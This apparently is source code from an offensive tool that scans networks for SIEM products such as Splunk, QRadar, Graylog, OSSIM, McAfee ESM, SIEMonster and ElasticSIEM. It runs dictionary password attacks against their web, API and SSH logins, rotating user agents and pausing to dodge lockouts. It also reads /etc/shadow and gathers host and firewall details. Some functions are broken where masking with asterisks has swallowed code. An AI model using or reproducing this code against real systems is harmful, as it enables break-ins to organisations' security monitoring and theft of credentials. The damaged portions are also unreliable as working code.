def qradar_apikeybrute(ip, port):
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
if os.path.isfile(os.path.join(__location__, keys)):
file = open(os.path.join(__location__, keys))
else:
cant = input(
Fore.CYAN + Style.BRIGHT +
"[!] Enter the number of apikeys you want in the dictionary: " +
Style.RESET_ALL)
try:
api_dict(cant)
file = open(os.path.join(__location__, keys))
except:
globals.qradar_messages(1)
bfs = 0
for line in file:
api = line.strip('\n\r')
url = globals.https + ip + ":" + str(port) + "/api/system/servers"
headers = {'SEC': api}
if requests.get(url, headers=headers, verify=False).status_code == 200:
globals.messages(7)
globals.qradar_messages(2, api)
bfs = 1
file.close()
break
if bfs == 0:
globals.messages(8)
file.close()
def smonster_ssh_info(ip):
password = input(Fore.CYAN + Style.NORMAL +
"[!] Enter SIEMonster deploy's password: "******"hostname", "[!] Hostname"),
("docker ps --format \"table {{.Names}}\t{{.Ports}}\t"
"{{.Status}}\"", "[!] Active Containers"),
("ls -1 /etc/rc5.d", "[!] List service active"),
("ifconfig", "[!] Network Configuration"),
("sudo iptables -nL", "[!] FW Configuration")]
for command in commands:
stdin, stdout, stderr = ssh.exec_command(command[0])
if stdout != "":
print('')
print(Fore.GREEN + Style.NORMAL + command[1])
print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL)
for i in stdout.readlines():
print('[!] ' + i.replace('\n', ''))
except paramiko.AuthenticationException:
globals.messages(10)
ssh.close()
def menus(menu): globals.messages(1, '') if menu == 1: options = enumerate(globals.main_menu, 1) elif menu == "Splunk": options = enumerate(globals.splunk_menu, 1) elif menu == "Graylog": options = enumerate(globals.graylog_menu, 1) elif menu == "OSSIM": options = enumerate(globals.ossim_menu, 1) elif menu == "QRadar": options = enumerate(globals.qradar_menu, 1) elif menu == "McAfee": options = enumerate(globals.mcafee_menu, 1) elif menu == "SIEMonster": options = enumerate(globals.smonster_menu, 1) elif menu == "ElasticSIEM": options = enumerate(globals.elastic_menu, 1) elif menu == 2: options = enumerate(globals.app_menu, 1) for c, i in options: print(Fore.GREEN + Style.BRIGHT + '\t[' + str(c) + '] ' + i) if menu == 1: print(Fore.GREEN + Style.BRIGHT + '\t[X] Exit') elif menu == 2: print(Fore.GREEN + Style.BRIGHT + '\t[X] Return to Attack Menu') else: print(Fore.GREEN + Style.BRIGHT + '\t[X] Return to Main Menu') print(Fore.GREEN + Style.BRIGHT + SEPARATOR) choice = input( Fore.CYAN + Style.NORMAL + "[!] Enter your selection: " + Style.RESET_ALL) return choice
def scan_detect(): ip = input_ip() port = input_port() siemdetected = '' if (ip and port) != '': siemdetected = scan_host(ip, port) else: globals.messages(3) sleep(1) main_choice() choice2 = input( Fore.CYAN + Style.BRIGHT + "[!] Do you want to launch the " + siemdetected + " attack module (Y/N): " + Style.RESET_ALL) if choice2.lower() == "y": if port == 0 and siemdetected == "Splunk": attack_choice(siemdetected, ip, '8089') elif port == 0 and siemdetected == "Graylog": attack_choice(siemdetected, ip, '9000') elif port == 0 and ( siemdetected == "OSSIM" or siemdetected == "QRadar" or siemdetected == "McAfee" or siemdetected == "SIEMonster"): attack_choice(siemdetected, ip, '443') else: attack_choice(siemdetected, ip, port) else: main_choice()
def find_siem():
siemsdetected = {}
siemnet = input_net()
if re.search(globals.net_val, siemnet):
ips = scan_network(siemnet)
else:
globals.messages(4)
sleep(1)
main_choice()
globals.messages(6)
for host in ips:
siemdetected = scan_host(host, '0')
siemsdetected[host] = siemdetected
siemchoice = input(
Fore.CYAN + Style.BRIGHT +
"[!] Enter the IP address of the SIEM to attack: " +
Style.RESET_ALL)
portchoice = input(
Fore.CYAN + Style.BRIGHT + "[!] Enter the port of the SIEM to attack: " +
Style.RESET_ALL)
choice2 = input(
Fore.CYAN + Style.BRIGHT + "[!] Do you want to launch the " +
siemsdetected[siemchoice] + " attack module (Y/N): " + Style.RESET_ALL)
if choice2.lower() == "y":
attack_choice(siemsdetected[siemchoice], siemchoice, portchoice)
else:
main_choice()
def attack_choice(siemdetected, ip, port): choiceerror = 0 attackchoice = menus(siemdetected) if siemdetected == "Splunk": splunk_attack(attackchoice, ip, port) elif siemdetected == "Graylog": graylog_attack(attackchoice, ip, port) elif siemdetected == "OSSIM": ossim_attack(attackchoice, ip, port) elif siemdetected == "QRadar": qradar_attack(attackchoice, ip, port) elif siemdetected == "McAfee": mcafee_attack(attackchoice, ip, port) elif siemdetected == "SIEMonster": smonster_attack(attackchoice, ip, port) elif siemdetected == "ElasticSIEM": elastic_attack(attackchoice, ip, port) elif attackchoice.lower() == "x": main_choice() else: globals.messages(2) sleep(1) attack_choice(siemdetected, ip, port) choiceerror = 1 if attackchoice != "0" and choiceerror != 1: # Not return and not error choice3 = input( Fore.CYAN + Style.BRIGHT + "[!] Do you want to return to the attack menu (Y/N): " + Style.RESET_ALL) if choice3.lower() == "y": attack_choice(siemdetected, ip, port) else: main_choice()
def smonster_ssh_bf(ip):
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
file = open(os.path.join(__location__, 'dict.txt'))
nm = nmap.PortScanner()
bps = 0
try:
nm.scan(hosts=ip, arguments='-sT -T4 -p 22')
if nm[ip]['tcp'][22]['state'] == 'open':
for line in file:
password = line.strip('\n\r')
if ssh_credentials(ip, password):
mess = ['deploy', password]
globals.messages(7)
globals.messages(9, mess)
file.close()
bps = 1
break
if bps == 0:
globals.messages(8)
file.close()
else:
globals.messages(8)
file.close()
except Exception as e:
globals.messages(8)
file.close()
logging.error(e, exc_info=True)
def smonster_users_server(ip):
password = input(Fore.CYAN + Style.NORMAL +
"[!] Enter SIEMonster deploy's password: "******"sudo cat /etc/shadow")
std.flush()
shadow_file = stdout.readlines()
globals.smonster_messages(2)
for line in shadow_file:
print('[!] ' + line.replace('\n', ''))
ssh.close()
except paramiko.AuthenticationException:
globals.messages(10)
ssh.close()
def elastic_ssh_brute(ip):
username = input(Fore.CYAN + Style.NORMAL +
"[!] Enter username of operations system: ")
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
file = open(os.path.join(__location__, 'dict.txt'))
nm = nmap.PortScanner()
bps = 0
if username == '':
username = '******'
try:
nm.scan(hosts=ip, arguments='-sT -T4 -p 22')
if nm[ip]['tcp'][22]['state'] == 'open':
for line in file:
password = line.strip('\n\r')
if ssh_credentials(ip, password, username):
mess = [username, password]
globals.messages(7)
globals.messages(9, mess)
file.close()
bps = 1
break
if bps == 0:
globals.messages(8)
file.close()
else:
globals.messages(8)
file.close()
except Exception as e:
globals.messages(8)
file.close()
logging.error(e, exc_info=True)
def graylog_detect(siemip, siemport): url = http + siemip + ":" + siemport try: response = requests.get(url) if "Graylog Web Interface" in response.text: siemdetected = "Graylog" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def splunk_detect(siemip, siemport): url = https + siemip + ":" + siemport try: response = requests.get(url, verify=False) if "splunkd" in response.text: siemdetected = "Splunk" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def ossim_detect(siemip, siemport): url = https + siemip + ":" + siemport + "/ossim/session/login.php" try: response = requests.get(url, verify=False) if "AlienVault OSSIM" in response.text: siemdetected = "OSSIM" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def qradar_detect(siemip, siemport): url = https + siemip + ":" + siemport + "/console/" try: response = requests.get(url, verify=False) if "QRadar" in response.headers['Server']: siemdetected = "QRadar" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def smonster_detect(siemip, siemport): url = https + siemip + ":" + siemport try: response = requests.get(url, verify=False) if 'title>SIEMonster ' in response.text: siemdetected = "SIEMonster" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def mcafee_detect(siemip, siemport): url = https + siemip + ":" + siemport try: response = requests.get(url, verify=False) if 'McAfee' in response.text and 'SIEM' in response.text: siemdetected = "McAfee" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def bruteforce_splunk(ip, port):
username = "******"
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
file = open(os.path.join(__location__, 'dict.txt'))
bfs = 0
free = 0
defaultpass = 0
# First Try Default Password "changeme" and Splunk Free Version
try:
client.connect(host=ip, port=port, username=username, password="")
free = 1
except:
pass
try:
client.connect(host=ip,
port=port,
username=username,
password="******")
defaultpass = 1
except:
pass
if (free and defaultpass) == 0:
for line in file:
splunk_password = line.strip('\n\r')
try:
client.connect(host=ip,
port=port,
username=username,
password=splunk_password)
bfs = 1
break
except:
pass
if (bfs or free or defaultpass) == 1:
globals.messages(7)
if free == 1:
globals.messages(9, ['admin', 'no password'])
file.close()
elif defaultpass == 1:
globals.messages(9, ['admin', 'changeme'])
file.close()
else:
globals.messages(9, ['admin', splunk_password])
file.close()
else:
globals.messages(8)
file.close()
def mcafee_webinfo(ip, port):
agents = 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0'
a = 0
password = input(
Fore.CYAN + Style.NORMAL + "[!] Enter password of the user Web NGCP: "
+ Style.RESET_ALL)
url1 = globals.https + ip + ":" + str(port) + "/ess"
url2 = globals.https + ip + ":" + str(port) + "/rs/esm/v2/login"
url3 = globals.https + ip + ":" + str(port) + "/rs/v1/systemInformation"
headers = {
'Accept': 'application/json,text/plain,*/*',
'DNT': '1',
'Host': ip,
'Origin': globals.https + ip,
'Referer': globals.https + ip,
'User-Agent': agents[a],
'Content-Type': 'application/json;charset=utf-8',
'Connection': 'keep - alive',
'X-Xsrf-Token': 'null'
}
params = {
'username': '******',
'password': str(base64.b64encode(password.encode('utf-8')), 'utf-8'),
'locale': 'en_US',
'os': "Linux x86_64"
}
json_params = json.dumps(params).encode('utf-8')
data_show = [
'callHomeIp', 'releaseNumber', 'hdd',
'ram', 'processor', 'esssystemTime',
'statusAndAlertNextCheckIn', 'rulesAndSoftNextCheck', 'backupNextTime'
]
try:
requests.post(
url1, data='Request=API%13CAC%5FLOGIN%13%14',
headers=headers, verify=False)
headers['Accept'] = 'application/json'
response = requests.post(
url2, data=json_params, headers=headers, verify=False)
if response.status_code == 201:
headers['Cookie'] = response.headers['Set-Cookie']
headers['X-Xsrf-Token'] = response.headers['xsrf-token']
response2 = requests.get(url3, headers=headers, verify=False)
globals.mcafee_messages(1)
data = json.loads(response2.text)
for field in data_show:
if data[field] != "":
print('[!] ' + field + ': ' + str(data[field]))
else:
globals.messages(10)
except Exception as e:
logging.error(e, exc_info=True)
def elasticsiem_detect(siemip, siemport): url = http + siemip + ":" + siemport + '/app/siem' try: response = requests.get(url) if "Elastic" in response.text and "elasticsiem" in response.headers[ 'kbn-name']: siemdetected = "ElasticSIEM" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def ova_credentials(ip, user, password):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
mess = [user, password]
try:
ssh.connect(ip, username=user, password=password)
globals.splunk_messages(10)
globals.messages(9, mess)
except paramiko.AuthenticationException:
globals.splunk_messages(11, mess)
def main_choice(): choice = menus(1) if choice == "1": # Scan and Detect SIEM scan_detect() elif choice == "2": # Find SIEM on the Network find_siem() elif choice.upper() == "X": quit() else: globals.messages(2) main_choice()
def graylog_brute(ip, port):
url = \
globals.http + ip + ":" + str(port) + "/api/system/sessions"
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
files = open(os.path.join(__location__, 'dict.txt'))
bruteforcesuccesfull = 0
for line in files:
password = line.strip('\n\r')
params = {'username': '******', 'password': password, 'host': ip}
headers = {'X-Requested-By': 'XMLHttpRequest'}
try:
response = requests.post(url,
json=params,
headers=headers,
verify=False)
if response.status_code == 200:
globals.messages(7)
mess = ['admin', password]
globals.messages(9, mess)
bruteforcesuccesfull = 1
files.close()
break
except Exception as e:
logging.error(e, exc_info=True)
files.close()
if not bruteforcesuccesfull:
globals.messages(8)
def mcafee_users_server(ip):
password = input(
Fore.CYAN + Style.NORMAL + "[!] Enter McAfee root's password: "
+ Style.RESET_ALL)
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(ip, username='******', password=password,
banner_timeout=200)
sftp = ssh.open_sftp()
shadow_file = sftp.open('/etc/shadow')
globals.mcafee_messages(2)
for line in shadow_file:
print('[!] ' + line.replace('\n', ''))
shadow_file.close()
ssh.close()
except paramiko.AuthenticationException:
globals.messages(10)
ssh.close()
def elastic_ssh_info(ip):
username = input(Fore.CYAN + Style.NORMAL +
"[!] Enter ElasticSIEM's username: "******"[!] Enter ElasticSIEM's password: "******"hostname", "[!] Hostname"),
("ls -1 /etc/rc5.d", "[!] List service active"),
("ifconfig", "[!] Network Configuration"),
('netstat -putan | grep LISTEN', "[!] Ports active")]
for command in commands:
std, stdout, stderr = ssh.exec_command(command[0])
if stdout != "":
print('')
print(Fore.GREEN + Style.NORMAL + command[1])
print(Fore.GREEN + Style.NORMAL + globals.SEPARATOR +
Style.RESET_ALL)
for i in stdout.readlines():
print('[!] ' + i.replace('\n', ''))
ssh.close()
except paramiko.AuthenticationException:
globals.messages(10)
ssh.close()
def ossim_brute(ip, port):
url = globals.https + ip + ":" + str(port) + "/ossim/session/login.php"
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
file = open(os.path.join(__location__, 'dict.txt'))
successurl = globals.https + ip + "/ossim/"
bruteforceresult = 0
for line in file:
ossimpassword = line.strip('\n\r')
ossimpasswordb64 = base64.b64encode(ossimpassword.encode("utf-8"))
base64string = str(ossimpasswordb64, "utf-8")
params = {
'embed': '',
'bookmark_string': '',
'user': '******',
'passu': ossimpassword,
'pass': base64string
}
try:
response = requests.post(url, params=params, verify=False)
if response.status_code == 302 or response.url == successurl:
globals.messages(7)
mess = ['admin', ossimpassword]
globals.messages(9, mess)
bruteforceresult = 1
file.close()
break
except Exception as e:
logging.error(e, exc_info=True)
if not bruteforceresult:
globals.messages(8)
file.close()
def qradar_brute(ip, port):
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
file = open(os.path.join(__location__, 'dict.txt'))
bfs = 0
url_base = globals.https + ip + ":" + str(port)
agents = [
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, '
'like Gecko) Chrome/79.0.3945.88 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) '
'Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) '
'Gecko/20100101 Firefox/42.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, '
'like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41',
'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) '
'AppleWebKit/603.1.30 (KHTML, like Gecko)'
' Version/10.0 Mobile/14E304 Safari/602.1'
]
a = 0
for line in file:
password = line.strip('\n\r')
url = url_base + "/console/"
session = requests.Session()
headers = {'user-agent': agents[a]}
response = session.get(url, headers=headers, verify=False)
headers = {'user-agent': agents[a], 'QRadarCSRF': 'null'}
qradarcsrf = response.headers[
'Set-Cookie'][response.headers['Set-Cookie'].find('CSRF=') +
5:response.headers['Set-Cookie'].find('; Max')]
params = {
'j_username': '******',
'j_password': password,
'LoginCSRF': qradarcsrf
}
auth = url_base + "/console/j_security_check"
try:
response2 = session.post(auth,
data=params,
headers=headers,
verify=False)
if response2.url == url_base + "/console/core/jsp/Main.jsp" or response2.status_code == 322:
globals.messages(7)
globals.messages(9, ['admin', password])
bfs = 1
file.close()
break
else:
if a <= 3:
a += 1
else:
time.sleep(1800)
a = 0
except Exception as e:
logging.error(e, exc_info=True)
if bfs == 0:
globals.messages(8)
file.close()
def mcafee_brute(ip, port):
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
file = open(os.path.join(__location__, 'dict.txt'))
bruteforcesuccesfull = 0
https = "https://"
agents = [
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,'
' like Gecko) Chrome/79.0.3945.88 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/42.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,'
' like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41'
]
a = 0
for line in file:
password = line.strip('\n\r')
url1 = https + ip + ":" + str(port) + "/ess"
url2 = https + ip + ":" + str(port) + "/rs/esm/v2/login"
headers = {
'Accept': 'application/json,text/plain,*/*',
'DNT': '1',
'Host': ip,
'Origin': 'https://' + ip,
'Referer': 'https://' + ip,
'User-Agent': agents[a],
'Content-Type': 'application/json;charset=utf-8',
'Connection': 'keep - alive',
'X-Xsrf-Token': 'null'
}
params = {
'username': '******',
'password': str(base64.b64encode(password.encode('utf-8')), 'utf-8'),
'locale': 'en_US',
'os': "Linux x86_64"
}
json_params = json.dumps(params).encode('utf-8')
try:
response = requests.post(
url1, data='Request=API%13CAC%5FLOGIN%13%14',
headers=headers, verify=False)
if response.status_code == 200:
headers['Accept'] = 'application/json'
response2 = requests.post(
url2, data=json_params, headers=headers, verify=False)
if response2.status_code == 201:
globals.messages(7)
mess = ['NGCP', password]
globals.messages(9, mess)
bruteforcesuccesfull = 1
break
else:
if a <= 2:
a += 1
else:
time.sleep(360)
a = 0
except Exception as e:
logging.error(e, exc_info=True)
if not bruteforcesuccesfull:
globals.messages(8)
